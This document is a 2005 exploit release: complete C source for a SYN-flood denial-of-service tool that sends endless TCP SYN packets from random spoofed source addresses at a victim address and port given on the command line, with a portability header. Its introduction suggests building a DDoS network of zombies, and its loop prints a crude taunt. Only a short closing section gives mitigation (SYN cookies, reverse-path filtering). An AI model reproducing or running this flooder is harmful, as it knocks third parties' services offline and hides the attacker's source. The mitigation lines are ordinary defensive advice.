DoS Tools With Random IP spoofing + SYN packet
------------------------------------------------

This script has been tested on linux and *BSD system
without antispoof router ;)
Create Server Daemon as a zombie and Client as a master if u want to setup a DDoS network
Publish at 19 december 2005
No warranty for this script

X------------------------------------------ floodrand.c ---------------------------------------X

#include "stdio.h"
#include "stdlib.h"
#include "time.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "gombong.h"
#include "netinet/in.h"
#include "netdb.h"
#include "string.h"
#include "unistd.h"

#define TTL 255
#define IPV 4
#define OFFSET 5
#define WINDOW_SIZE 512

struct pseudohdr
{
struct in_addr source_address;
struct in_addr dest_address;
unsigned char place_holder;
unsigned char protocol;
unsigned short length;
}pseudohdr;

unsigned short in_cksum(unsigned short *addr,int len)
{
register int sum        = 0;
u_short answer          = 0;
register u_short *w     = addr;
register int nleft      = len;

/*
 * Our algorithm is simple, using a 32 bit accumulator (sum), we add
 * sequential 16 bit words to it, and at the end, fold back all the
 * carry bits from the top 16 bits into the lower 16 bits.
 */
while (nleft > 1)
{
      sum += *w++;
      nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}

/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
sum += (sum >> 16);                     /* add carry */
answer = ~sum;                          /* truncate to 16 bits */
return(answer);
}

int syn_packet(int sors_port, char *sors_addr, int des_port, char *des_addr)
{
unsigned char packet[sizeof(struct ip) + sizeof(struct tcphdr)];
struct sockaddr_in sock;
struct tcphdr *tcp;
struct ip *iphdr;
char *pseudo_packet;
unsigned long seq,ack;
int src_port, dest_port;
struct in_addr src_addr, dest_addr;
int s,on = 1;


src_addr.s_addr 	= inet_addr(sors_addr);
src_port        	= sors_port;
dest_addr.s_addr 	= inet_addr(des_addr);
dest_port        	= des_port;

if((s=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)
{
perror("socket");
exit(1);
}
if(setsockopt(s,IPPROTO_IP,IP_HDRINCL, (char *)&on,sizeof(on))<0)
{
perror("setsockopt");
exit(1);
}

seq = rand() % time(NULL);
ack = rand() % time(NULL);

iphdr = (struct ip *)packet;
memset((char *)iphdr,'\0',sizeof(struct ip));
iphdr->ip_v 		= IPV;
iphdr->ip_hl		= 5;
iphdr->ip_len		= htons(sizeof(packet));
iphdr->ip_id		= htons(getpid());
iphdr->ip_ttl		= TTL;
iphdr->ip_p	        = IPPROTO_TCP;
iphdr->ip_sum		= (unsigned short)in_cksum((unsigned short *)iphdr,sizeof(struct ip));
iphdr->ip_src	        = src_addr.s_addr;
iphdr->ip_dst           = dest_addr.s_addr;

tcp = (struct tcphdr *)(packet + sizeof(struct ip));
memset((char *)tcp,'\0',sizeof(struct tcphdr));
tcp->th_sport			= htons(src_port);
tcp->th_dport			= htons(dest_port);
tcp->th_seq			= htonl(seq);
tcp->th_ack		        = htonl(ack);
tcp->th_off			= OFFSET;
tcp->th_flags			= TH_SYN;
tcp->th_win			= htons(WINDOW_SIZE);

pseudohdr.protocol		= IPPROTO_TCP;
pseudohdr.length		= htons(sizeof(struct tcphdr));
pseudohdr.place_holder  	= 0;
pseudohdr.source_address	= src_addr;
pseudohdr.dest_address		= dest_addr;

if((pseudo_packet = (char *)malloc(sizeof(pseudohdr) + sizeof(struct tcphdr))) == NULL)
{
perror("malloc");
exit(1);
}
memcpy(pseudo_packet, &pseudohdr, sizeof(pseudohdr));
memcpy((pseudo_packet + sizeof(pseudohdr)), tcp, sizeof(struct tcphdr));
tcp->th_sum = (unsigned short)in_cksum((unsigned short *)pseudo_packet, (sizeof(struct tcphdr) + sizeof(pseudohdr)));
free(pseudo_packet);

memset(&sock, '\0', sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port   = htons(dest_port);
sock.sin_addr   = dest_addr;

if(sendto(s, &packet, sizeof(packet), 0x0, (struct sockaddr *)&sock, sizeof(sock)) != sizeof(packet))
{
perror("sendto");
exit(1);
}
close(s);
}

int main(int argc,char *argv[])
{
int i,a,b,c,d;
char ipsors[20];
int sp,dp;
if(argc < 3)
{
printf("\nIP SPOOF - SYN PACKET DENIAL of SERVICES EXPLOITS\n");
printf("CODED By : Ph03n1X http://gombong.6te.net || king_purba@yahoo.co.uk\n");
printf("IP SPOOF CODED By Dominator n3rf security, 2001 linux version \n");
printf("MODIFIED and TESTED By ME on openBSD 3.x for SYN FLOODZ..\n");
printf("\nusage: %s <victim address> <victim port>\n\n", argv[0]);
exit(1);
}
dp=atoi(argv[2]);
i=1;
for(;;)
{
a=rand()%255;
b=rand()%255;
c=rand()%255;
d=rand()%255;
snprintf(ipsors,sizeof(ipsors),"%d.%d.%d.%d",a,b,c,d);
sp=rand()%65535;
syn_packet(sp,ipsors,dp,argv[1]);
printf("Let's fuck the bitch-%d\n",i);
i++;
}
}


X-------------------------------------- gombong.h ----------------------------------------X

/*
I create this header to support compilation in linux and *BSD system
Coded By Ph03n1X king_purba@yahoo.co.uk || student.te.ugm.ac.id/~phoenix03
This header base on netinet/ip.h and netinet/tcp.h (OpenBSD)
*/

#ifndef _NETINET_IP_H_
#define _NETINET_IP_H_

/*
 * Base on RFC 791 ABOUT IP VERSION 4
 */
#define	IPVERSION	4

/*
 * Structure of an internet header, naked of options.
 */
struct ip {
#if BYTE_ORDER == LITTLE_ENDIAN
	u_int8_t  ip_hl:4,		/* header length */
		  ip_v:4;		/* version */
#endif
#if BYTE_ORDER == BIG_ENDIAN
	u_int8_t  ip_v:4,		/* version */
		  ip_hl:4;		/* header length */
#endif
	u_int8_t  ip_tos;		/* type of service */
	u_int16_t ip_len;		/* total length */
	u_int16_t ip_id;		/* identification */
	u_int16_t ip_off;		/* fragment offset field */
#define	IP_RF 0x8000			/* reserved fragment flag */
#define	IP_DF 0x4000			/* dont fragment flag */
#define	IP_MF 0x2000			/* more fragments flag */
#define	IP_OFFMASK 0x1fff		/* mask for fragmenting bits */
	u_int8_t  ip_ttl;		/* time to live */
	u_int8_t  ip_p;			/* protocol */
	u_int16_t ip_sum;		/* checksum */
	u_int32_t ip_src;
	u_int32_t ip_dst;
};

#define	IP_MAXPACKET	65535		/* maximum packet size */
#endif /* _NETINET_IP_H_ */


#ifndef _NETINET_TCP_H_
#define	_NETINET_TCP_H_

typedef u_int32_t tcp_seq;

/*
 * TCP header.
 * Per RFC 793, September, 1981.
 */
struct tcphdr {
	u_int16_t th_sport;		/* source port */
	u_int16_t th_dport;		/* destination port */
	tcp_seq	  th_seq;		/* sequence number */
	tcp_seq	  th_ack;		/* acknowledgement number */
#if BYTE_ORDER == LITTLE_ENDIAN
	u_int8_t  th_x2:4,		/* (unused) */
		  th_off:4;		/* data offset */
#endif
#if BYTE_ORDER == BIG_ENDIAN
	u_int8_t  th_off:4,		/* data offset */
		  th_x2:4;		/* (unused) */
#endif
	u_int8_t  th_flags;
#define	TH_FIN	  0x01
#define	TH_SYN	  0x02
#define	TH_RST	  0x04
#define	TH_PUSH	  0x08
#define	TH_ACK	  0x10
#define	TH_URG	  0x20
#define	TH_ECE	  0x40
#define	TH_CWR	  0x80
	u_int16_t th_win;			/* window */
	u_int16_t th_sum;			/* checksum */
	u_int16_t th_urp;			/* urgent pointer */
};
#endif


X------------------------------------------ Fix --------------------------------------------X

Fix:
Add this line in /etc/sysctl.conf

net.ipv4.tcp_syncookies=1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

More Info to Fix DoS SYN :
http://www.securityfocus.com/infocus/1729
http://www.securityfocus.com/infocus/1853